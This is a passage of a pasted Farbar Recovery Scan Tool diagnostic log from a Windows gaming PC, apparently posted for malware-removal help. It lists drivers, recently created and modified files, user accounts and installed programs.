R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
S3 EQU8_HELPER_19; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_19.sys [38032 2021-10-08] (Int3 Software AB -> )
S3 gdrv; C:\Windows\gdrv.sys [25640 2020-07-01] (Giga-Byte Technology -> Windows ® Server 2003 DDK provider)
R3 HHTHid; C:\WINDOWS\System32\drivers\HHTHid.sys [24784 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 HHTHid_ArtvhMouFiltr; C:\WINDOWS\System32\drivers\HHTHidMouFiltr.sys [23896 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-10-31] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1090904 2019-12-22] (Shanghai Yitu Information Technology Co.,Ltd. -> e2eSoft)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8607648 2022-06-29] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49576 2022-06-22] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [452856 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [91384 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
S3 equ8_helper; \??\C:\WINDOWS\system32\DRIVERS\equ8_helper.sys [X]
S3 wtbt; \??\c:\program files (x86)\steam\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-07-15 22:41 - 2022-07-15 22:42 - 000000000 ____D C:\AdwCleaner
2022-07-15 22:41 - 2022-07-15 22:41 - 008551608 _____ (Malwarebytes) C:\Users\Miggy\Downloads\AdwCleaner.exe
2022-07-15 22:32 - 2022-07-15 22:33 - 000080994 _____ C:\Users\Miggy\Downloads\Addition.txt
2022-07-15 22:31 - 2022-07-16 12:13 - 000026907 _____ C:\Users\Miggy\Downloads\FRST.txt
2022-07-15 22:31 - 2022-07-16 12:12 - 000000000 ____D C:\FRST
2022-07-15 22:31 - 2022-07-15 22:31 - 002369536 _____ (Farbar) C:\Users\Miggy\Downloads\FRST64.exe
2022-07-15 22:20 - 2022-07-15 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\chrome_tab
2022-07-15 18:39 - 2022-07-15 18:40 - 060178785 _____ C:\Users\Miggy\Downloads\dokkan-scout.exe
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D C:\Users\Miggy\AppData\Local\Enverr
2022-07-13 22:29 - 2022-07-13 22:29 - 000000220 _____ C:\Users\Miggy\Desktop\Garry's Mod.url
2022-07-13 18:34 - 2022-07-13 18:34 - 000693248 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000470528 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-07-13 18:34 - 2022-07-13 18:34 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mode.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000018944 _____ C:\WINDOWS\SysWOW64\WsdProviderUtil.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tree.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000640512 _____ C:\WINDOWS\system32\SettingSyncDownloadHelper.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000530944 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-07-13 18:33 - 2022-07-13 18:33 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000270848 _____ C:\WINDOWS\system32\EsclScan.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000152064 _____ C:\WINDOWS\system32\EsclProtocol.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000061952 _____ C:\WINDOWS\system32\printticketvalidation.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000057344 _____ C:\WINDOWS\system32\APMonUI.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000024576 _____ C:\WINDOWS\system32\WsdProviderUtil.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000011811 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-07-13 18:26 - 2022-07-13 18:26 - 000000000 ___HD C:\$WinREAgent
2022-07-13 12:49 - 2022-07-13 12:49 - 000000222 _____ C:\Users\Miggy\Desktop\Batman Arkham City GOTY.url
2022-07-12 17:37 - 2022-07-12 17:37 - 000000000 ____D C:\Users\Miggy\AppData\Local\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000001032 _____ C:\Users\Public\Desktop\ONN..lnk
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Program Files (x86)\ONN
2022-07-12 17:36 - 2019-10-10 08:59 - 000024784 _____ (0) C:\WINDOWS\system32\Drivers\HHTHid.sys
2022-07-12 17:36 - 2019-10-10 08:59 - 000023896 _____ (0) C:\WINDOWS\system32\Drivers\HHTHidMouFiltr.sys
2022-07-12 17:35 - 2022-07-12 17:36 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05 (1).exe
2022-07-12 17:35 - 2022-07-12 17:35 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05.exe
2022-07-11 22:18 - 2022-07-11 22:18 - 000000223 _____ C:\Users\Miggy\Desktop\Fears to Fathom - Episode 2.url
2022-07-11 16:14 - 2022-07-11 16:14 - 000000000 ____D C:\Program Files\EA Games
2022-07-11 15:32 - 2022-07-11 15:32 - 000013970 _____ C:\WINDOWS\system32\Tasks\chrome tab
2022-07-10 16:25 - 2022-07-10 16:25 - 000000000 ____D C:\Users\Miggy\Documents\New folder
2022-07-07 22:26 - 2022-07-09 19:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-07-05 18:55 - 2022-07-14 16:27 - 000000000 ____D C:\Program Files (x86)\Origin Games
2022-07-05 18:55 - 2022-07-05 18:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\Haze1
2022-07-05 18:54 - 2022-07-05 18:54 - 000001066 _____ C:\Users\Public\Desktop\Origin.lnk
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\Program Files (x86)\Origin
2022-07-05 18:53 - 2022-07-14 20:33 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Origin
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\Documents\WB Games
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\AppData\Local\Downloaded Installations
2022-06-27 18:02 - 2022-06-27 18:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Ardent Studios
2022-06-27 18:01 - 2022-06-27 18:01 - 000000223 _____ C:\Users\Miggy\Desktop\Smithworks.url
2022-06-26 22:13 - 2022-06-26 22:13 - 000000012 _____ C:\Users\Miggy\AppData\Roaming\asof
2022-06-24 21:24 - 2022-06-24 21:24 - 000000000 ____D C:\Users\Miggy\Documents\Telltale Games
2022-06-24 17:10 - 2022-06-24 17:10 - 000000000 ____D C:\Users\Miggy\Documents\Square Enix
2022-06-23 22:51 - 2022-06-23 22:51 - 000000000 ____D C:\Users\Miggy\AppData\Local\TJoC_R
2022-06-22 22:58 - 2022-07-15 23:03 - 000001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk
2022-06-22 22:50 - 2022-07-15 23:03 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk
2022-06-22 20:31 - 2022-06-22 20:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\Visage
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mediatonic
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\Local\EOSUserHelper
2022-06-21 12:26 - 2022-06-22 20:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\TwistedCarnivalDemo2
2022-06-20 17:27 - 2022-06-20 17:28 - 060760073 _____ C:\Users\Miggy\Downloads\Pokemon - SoulSilver Version (USA, Australia).zip
2022-06-20 17:22 - 2022-06-20 17:28 - 000000000 ____D C:\Users\Miggy\Downloads\desmume-0.9.13-win64
2022-06-20 17:22 - 2022-06-20 17:22 - 006086795 _____ C:\Users\Miggy\Downloads\desmume-0.9.13-win64.zip
2022-06-19 19:14 - 2022-07-10 16:26 - 000000000 ____D C:\Users\Miggy\Documents\Electronic Arts
2022-06-19 18:44 - 2014-09-16 18:45 - 000447752 _____ (On2.com) C:\WINDOWS\SysWOW64\vp6vfw.dll
2022-06-19 18:24 - 2022-06-19 18:32 - 000000000 ____D C:\ProgramData\EA Desktop
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Electronic Arts
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\EADesktop
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA
2022-06-19 18:23 - 2022-06-19 18:23 - 001361536 _____ (Electronic Arts) C:\Users\Miggy\Downloads\EAappInstaller.exe
2022-06-19 12:31 - 2022-06-19 12:31 - 000953171 _____ C:\Users\Miggy\Downloads\pluto_t5_full_game.torrent
2022-06-19 12:29 - 2022-06-19 12:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2022-06-19 12:29 - 2022-06-19 12:29 - 000000000 ____D C:\Program Files (x86)\qBittorrent
2022-06-18 19:50 - 2022-06-18 19:50 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\HotPink and Annue
2022-06-16 19:23 - 2022-06-16 19:23 - 000104448 _____ C:\WINDOWS\system32\nettraceex.dll
2022-06-16 19:22 - 2022-06-16 19:22 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2022-06-16 19:22 - 2022-06-16 19:22 - 000232288 _____ C:\WINDOWS\system32\containerdevicemanagement.dll
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-07-16 12:10 - 2020-07-31 20:07 - 000000000 ____D C:\Users\Miggy\AppData\Local\CrashDumps
2022-07-16 12:09 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\discord
2022-07-16 12:08 - 2021-11-13 19:25 - 000004152 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1A3EA42E-993D-412D-B564-43DC52E6644C}
2022-07-16 12:08 - 2021-07-09 21:35 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mozilla
2022-07-16 12:07 - 2020-11-24 16:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-16 12:07 - 2020-07-31 19:11 - 000000000 ____D C:\Users\Miggy\AppData\Local\Spotify
2022-07-16 12:06 - 2021-11-03 16:17 - 000000000 ____D C:\Users\Miggy\AppData\Local\Origin
2022-07-16 12:06 - 2020-08-13 00:26 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-16 12:06 - 2020-08-13 00:26 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-16 12:06 - 2020-08-04 16:40 - 000000000 ___RD C:\Users\Miggy\Creative Cloud Files
2022-07-16 12:06 - 2020-08-02 14:57 - 000000000 ____D C:\ProgramData\Origin
2022-07-16 12:06 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Discord
2022-07-16 12:06 - 2020-07-31 19:08 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Spotify
2022-07-16 12:06 - 2019-12-07 02:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-16 12:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-07-16 12:05 - 2020-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-16 12:05 - 2020-07-31 18:18 - 000000000 ___RD C:\Users\Miggy\OneDrive
2022-07-16 12:05 - 2020-02-05 16:06 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-15 23:55 - 2019-12-07 02:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-15 23:03 - 2022-05-17 17:09 - 000002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk
2022-07-15 23:03 - 2021-07-09 21:35 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-07-15 23:03 - 2020-08-09 21:02 - 000012424 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2022-07-15 23:03 - 2020-08-07 18:48 - 000013483 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2022-07-15 23:03 - 2020-08-01 19:19 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-07-15 23:03 - 2020-07-31 20:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-07-15 23:03 - 2020-07-31 19:48 - 000000000 ____D C:\ProgramData\Riot Games
2022-07-15 23:03 - 2020-07-31 18:24 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-15 23:03 - 2020-02-05 16:07 - 000015984 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2022-07-15 19:54 - 2022-05-12 17:24 - 000001386 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2022-07-15 19:54 - 2020-08-10 15:18 - 000013155 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2022-07-15 19:54 - 2020-08-10 01:20 - 000011819 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2022-07-15 19:54 - 2020-08-09 20:14 - 000012819 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2022-07-15 19:01 - 2020-08-04 16:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2022-07-15 18:31 - 2020-11-06 18:11 - 000000000 ___HD C:\adobeTemp
2022-07-14 20:33 - 2020-08-01 09:48 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-07-14 14:33 - 2022-06-05 15:02 - 000000000 ____D C:\Users\Miggy\Documents\MEGAsync Downloads
2022-07-14 11:39 - 2019-12-07 02:13 - 000000000 ____D C:\WINDOWS\INF
2022-07-14 11:36 - 2021-03-15 13:25 - 000840598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-07-14 11:32 - 2021-03-15 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-07-14 11:32 - 2021-03-15 13:17 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-14 11:32 - 2020-07-31 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-07-13 23:07 - 2021-03-15 13:17 - 000257904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-07-13 23:07 - 2020-07-31 20:17 - 000000000 ____D C:\Program Files\Riot Vanguard
2022-07-13 23:07 - 2019-12-07 02:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2022-07-13 23:06 - 2021-03-15 13:18 - 000000000 ____D C:\Users\Miggy
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\DDFs
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-07-13 22:47 - 2020-08-01 12:57 - 000001425 _____ C:\Users\Miggy\Desktop\Roblox Player.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000001248 _____ C:\Users\Miggy\Desktop\Roblox Studio.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-07-13 18:36 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-07-13 18:33 - 2021-03-15 13:19 - 003010560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-07-13 18:26 - 2020-08-01 15:02 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-07-13 18:23 - 2020-08-01 15:02 - 146546848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-07-13 18:22 - 2020-01-24 10:48 - 000000000 ____D C:\Program Files (x86)\AMD
2022-07-13 13:03 - 2021-03-15 13:17 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-07-12 23:49 - 2021-01-02 18:45 - 000000000 ____D C:\Users\Miggy\AppData\Local\Battle.net
2022-07-12 13:10 - 2020-10-08 10:01 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\SurvivioSteam
2022-07-11 22:21 - 2022-01-22 00:32 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Rayll
2022-07-11 01:10 - 2021-03-19 22:09 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Vortex
2022-07-11 00:47 - 2022-04-09 15:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\FalloutNV
2022-07-11 00:46 - 2021-12-28 23:14 - 000000000 ____D C:\Users\Miggy\AppData\Local\Fallout4
2022-07-10 22:27 - 2022-01-10 16:17 - 000001976 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk
2022-07-10 19:31 - 2021-05-01 00:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\BattlEye
2022-07-10 16:17 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Adobe
2022-07-10 16:04 - 2020-10-10 20:06 - 000000000 ____D C:\Users\Miggy\Documents\My Games
2022-07-10 15:38 - 2021-07-16 15:06 - 000000000 ____D C:\Users\Miggy\AppData\Local\Ubisoft Game Launcher
2022-07-09 19:54 - 2021-07-09 21:35 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-07-08 21:35 - 2021-11-22 21:01 - 000144872 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 002754024 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000402920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000234984 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000067048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-08 20:35 - 2021-10-15 21:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-07-07 19:00 - 2021-01-02 18:45 - 000000000 ____D C:\Program Files (x86)\Battle.net
2022-07-07 15:34 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\D3DSCache
2022-07-05 15:18 - 2022-03-12 10:58 - 000000000 ____D C:\Users\Miggy\Desktop\RPCS3
2022-07-05 14:47 - 2021-12-10 22:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-05 14:47 - 2021-03-15 13:21 - 000003364 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-05 14:47 - 2021-03-15 13:18 - 000002383 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-04 20:17 - 2020-07-31 18:24 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-07-02 23:24 - 2020-01-24 10:41 - 000000000 __RHD C:\Users\Public\AccountPictures
2022-06-26 22:13 - 2020-08-23 13:56 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\MMFApplications
2022-06-25 14:08 - 2020-01-24 10:41 - 000000000 ____D C:\ProgramData\Packages
2022-06-23 22:51 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\UnrealEngine
2022-06-23 18:25 - 2022-06-05 14:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\MEGAsync
2022-06-22 22:58 - 2020-09-25 11:07 - 000000000 ____D C:\Users\Public\Documents\Adobe
2022-06-22 22:58 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Common Files\Adobe
2022-06-22 22:48 - 2020-08-04 16:37 - 000000000 ____D C:\ProgramData\Adobe
2022-06-22 20:30 - 2022-05-12 17:28 - 000000000 ____D C:\XboxGames
2022-06-22 20:30 - 2020-07-31 18:16 - 000000000 ____D C:\Users\Miggy\AppData\Local\Packages
2022-06-22 17:19 - 2020-08-04 16:35 - 000000000 ____D C:\Users\Miggy\AppData\Local\Adobe
2022-06-22 17:19 - 2019-07-31 00:08 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2022-06-21 23:56 - 2021-10-03 18:40 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\PowerLine Studios
2022-06-21 13:02 - 2021-12-29 17:50 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\EasyAntiCheat
2022-06-21 11:46 - 2020-08-01 22:42 - 000000000 ____D C:\Program Files\Epic Games
2022-06-19 18:24 - 2021-07-12 18:14 - 000000000 ____D C:\Program Files\Electronic Arts
2022-06-19 18:24 - 2020-01-24 10:47 - 000000000 ____D C:\ProgramData\Package Cache
2022-06-19 15:51 - 2022-01-28 21:16 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\qBittorrent
2022-06-19 12:17 - 2021-12-25 13:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\Activision
2022-06-18 21:54 - 2022-05-28 20:04 - 000000000 ____D C:\Program Files (x86)\Overwatch
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-06-17 18:18 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\servicing
==================== Files in the root of some directories ========
2021-05-18 08:49 - 2021-10-15 16:59 - 000000032 _____ () C:\Users\Miggy\AppData\Roaming\.machineId
2021-10-13 22:03 - 2021-10-13 22:03 - 000006889 _____ () C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp
2022-06-26 22:13 - 2022-06-26 22:13 - 000000012 _____ () C:\Users\Miggy\AppData\Roaming\asof
2021-01-20 10:18 - 2021-01-20 10:18 - 000000116 _____ () C:\Users\Miggy\AppData\Roaming\debug.log
2022-03-08 21:51 - 2022-03-08 22:04 - 000000055 _____ () C:\Users\Miggy\AppData\Roaming\grizzly.ini
2020-11-28 13:16 - 2020-11-28 13:16 - 000000098 _____ () C:\Users\Miggy\AppData\Roaming\LauncherSettings_live.cfg
2020-11-28 12:39 - 2020-11-28 12:39 - 000002577 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_live.bin
2020-11-28 13:06 - 2020-11-28 13:06 - 000000048 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_steam_live.cfg
2020-08-04 16:43 - 2020-08-04 16:43 - 000000000 _____ () C:\Users\Miggy\AppData\Local\oobelibMkey.log
2021-10-18 17:32 - 2021-10-18 17:32 - 000016438 _____ () C:\Users\Miggy\AppData\Local\partner.bmp
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
And here is the addition.txt results
=================== Accounts: =============================
(If an entry is included in the fixlist, it will be removed.)
Administrator (S-1-5-21-2826498334-1472090739-1589450912-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2826498334-1472090739-1589450912-503 - Limited - Disabled)
Guest (S-1-5-21-2826498334-1472090739-1589450912-501 - Limited - Disabled)
Miggy (S-1-5-21-2826498334-1472090739-1589450912-1002 - Administrator - Enabled) => C:\Users\Miggy
WDAGUtilityAccount (S-1-5-21-2826498334-1472090739-1589450912-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 21.02 alpha (x64) (HKLM\...\7-Zip) (Version: 21.02 alpha - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.7.1.1 - Adobe Inc.)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.7.0.35 - Adobe Inc.)
Adobe Illustrator 2022 (HKLM-x32\...\ILST_26_3_1) (Version: 26.3.1 - Adobe Inc.)
